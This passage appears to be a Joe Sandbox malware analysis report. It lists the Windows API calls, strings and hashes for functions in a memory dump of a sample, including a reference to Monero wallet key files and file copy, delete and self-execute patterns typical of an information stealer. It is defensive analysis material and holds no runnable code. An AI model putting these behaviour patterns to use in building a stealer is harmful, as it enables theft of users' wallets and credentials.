                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$AllocLocal
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 4171519190-1096346117
                    • Opcode ID: 5004923cfb17fc379b7b3a95b0266e3735f8a81c7e567f91c6cd2bcaf07556f8
                    • Instruction ID: 4147b3744b6b6c6a0405b3a7915c12a135900af54dbffde89fcbdb1b19b357c8
                    • Opcode Fuzzy Hash: 5004923cfb17fc379b7b3a95b0266e3735f8a81c7e567f91c6cd2bcaf07556f8
                    • Instruction Fuzzy Hash: C3616E71A1060CABDB25EFA4DC96FED7779AF40308F408018FA0A9F591EB746E05CB52
                    Function 003C40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,0118E650,00000000,00020119,?), ref: 003C40F4
                    • RegQueryValueExA.ADVAPI32(?,0118F718,00000000,00000000,00000000,000000FF), ref: 003C4118
                    • RegCloseKey.ADVAPI32(?), ref: 003C4122
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4147
                    • lstrcat.KERNEL32(?,0118F730), ref: 003C415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID:
                    • API String ID: 690832082-0
                    • Opcode ID: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                    • Instruction ID: e9c00bd7f9cae08cd9909de0afa4d0a4de52494c3971178b5d0ebcd673d1bd51
                    • Opcode Fuzzy Hash: 59bc8e92497ae53bbf46cce14300a90cb1ee30a8718e8adf6a06eb7cab512513
                    • Instruction Fuzzy Hash: 7D41C9B69001086BDB25EBA0DC56FFD733DA798300F40455CB719DA181EA755B8CCBA3
                    Function 003C7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7E37
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C7E3E
                    • RegOpenKeyExA.ADVAPI32(80000002,0117BB90,00000000,00020119,?), ref: 003C7E5E
                    • RegQueryValueExA.ADVAPI32(?,0118E730,00000000,00000000,000000FF,000000FF), ref: 003C7E7F
                    • RegCloseKey.ADVAPI32(?), ref: 003C7E92
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                    • Instruction ID: e85c1ecc16446364ce3b0934064599ffd3f32c8200985fa44f81ad494593a789
                    • Opcode Fuzzy Hash: 5b34ea4eecd0326288590d2f71ca95e0273495d980ad2beb0b199cd3f5f22713
                    • Instruction Fuzzy Hash: C3114CB2A44205EBD704DB94DD49FBBBBBCEB08B10F104159FA09E7680D7B85C04DBA2
                    Function 003C9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                    Download Yara Rule
                    APIs
                    • StrStrA.SHLWAPI(0118F4C0,?,?,?,003C140C,?,0118F4C0,00000000), ref: 003C926C
                    • lstrcpyn.KERNEL32(005FAB88,0118F4C0,0118F4C0,?,003C140C,?,0118F4C0), ref: 003C9290
                    • lstrlen.KERNEL32(?,?,003C140C,?,0118F4C0), ref: 003C92A7
                    • wsprintfA.USER32 ref: 003C92C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID: %s%s
                    • API String ID: 1206339513-3252725368
                    • Opcode ID: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                    • Instruction ID: 0afc4a1688e52f8033987f338d3e6cc24220bfc69061f57e63b56b8b7216a11a
                    • Opcode Fuzzy Hash: 43bbc4e00f3d87f035240d7bcb3cd580fdf1c456c17d71b724d14466df224437
                    • Instruction Fuzzy Hash: 9301A5B650010CFFCB04DFE8D988EAE7BB9EB58354F108548F9099B204C675AA45DB96
                    Function 003B12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                    • RegCloseKey.ADVAPI32(?), ref: 003B12FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID:
                    • API String ID: 3225020163-0
                    • Opcode ID: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                    • Instruction ID: de461f1f6d01fa5fd4c0b9d25407f97388ca57e1dd61a45cad1a211111890de7
                    • Opcode Fuzzy Hash: 6de1493ff53a7841456354805197d34e730598b01b74fe04cfc5db21e95b20e3
                    • Instruction Fuzzy Hash: E1011DB9A40208BBDB00DFE0DC59FAEB7B8EB58705F008159FA09D7280D674AA05DB52
                    Function 003CC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: String___crt$Type
                    • String ID:
                    • API String ID: 2109742289-3916222277
                    • Opcode ID: 2c895261f7a0417e18621f84c516500534304360478518bcf187e73355fce6d4
                    • Instruction ID: 0699bf5f486fa079279014a8e83aba44c92b32c34e79761f78b6c0470931b037
                    • Opcode Fuzzy Hash: 2c895261f7a0417e18621f84c516500534304360478518bcf187e73355fce6d4
                    • Instruction Fuzzy Hash: 1541D5B151079C5EDB228B248C95FFBBBEC9B45704F1454ACE98AC6182D3719E45CF60
                    Function 003C6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 003C6663
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • ShellExecuteEx.SHELL32(0000003C), ref: 003C6726
                    • ExitProcess.KERNEL32 ref: 003C6755
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                    • String ID: <
                    • API String ID: 1148417306-4251816714
                    • Opcode ID: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                    • Instruction ID: de3325791a949387feadf2249f35d5502da3860e8254146ed7fdc4e3064caf6a
                    • Opcode Fuzzy Hash: 96215c5bfe0e19741e2a98074174527409f348d80b52c97200398a2a5d20273e
                    • Instruction Fuzzy Hash: 17312BB1801218ABDB15EB90DC96FEEB778AF14304F404189F209AA191DF746F49CF6A
                    Function 003C87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E28,00000000,?), ref: 003C882F
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C8836
                    • wsprintfA.USER32 ref: 003C8850
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                    • String ID: %dx%d
                    • API String ID: 1695172769-2206825331
                    • Opcode ID: 107431fd1c2ee97133d0db320e8aa02ac06d2cc23c1940ed8f67f813f8cef26c
                    • Instruction ID: eb02aa605bd98192b8f31695998ac9afe9cf1e1bae56f1fa0d38a7094a7c130c
                    • Opcode Fuzzy Hash: 107431fd1c2ee97133d0db320e8aa02ac06d2cc23c1940ed8f67f813f8cef26c
                    • Instruction Fuzzy Hash: F9212EB1A40208AFDB04DF94DD49FBEBBB8FB48711F104119F609E7280C7799904DBA2
                    Function 003C8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003C951E,00000000), ref: 003C8D5B
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C8D62
                    • wsprintfW.USER32 ref: 003C8D78
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcesswsprintf
                    • String ID: %hs
                    • API String ID: 769748085-2783943728
                    • Opcode ID: 96e46252852f7e68bb1b72765fe20c8edf5b8c67660739748d09aec4fba0a295
                    • Instruction ID: 45d19c428392a369fac70dcddaa074a484131b273cb21eb045a671427a1b5d68
                    • Opcode Fuzzy Hash: 96e46252852f7e68bb1b72765fe20c8edf5b8c67660739748d09aec4fba0a295
                    • Instruction Fuzzy Hash: 00E08CB1A40208BFD700EB94EC0AE6977B8EB04702F000094FD0DD7280DAB59E04EB93
                    Function 003BA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BA2E1
                    • lstrlen.KERNEL32(00000000,00000000), ref: 003BA3FF
                    • lstrlen.KERNEL32(00000000), ref: 003BA6BC
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    • DeleteFileA.KERNEL32(00000000), ref: 003BA743
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: 89e22168bac585afaf29629372cbf581826e2380f19c22c2845c556ea331a733
                    • Instruction ID: 45a04414fe58ab6e23db000ef5c58f42a0aea6b213400c2ccb8614039a16f658
                    • Opcode Fuzzy Hash: 89e22168bac585afaf29629372cbf581826e2380f19c22c2845c556ea331a733
                    • Instruction Fuzzy Hash: 71E1E97281060C9BCB16EBA4DC92FEE7738AF24304F50815DF516EA091EF346E09DB62
                    Function 003BD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD481
                    • lstrlen.KERNEL32(00000000), ref: 003BD698
                    • lstrlen.KERNEL32(00000000), ref: 003BD6AC
                    • DeleteFileA.KERNEL32(00000000), ref: 003BD72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
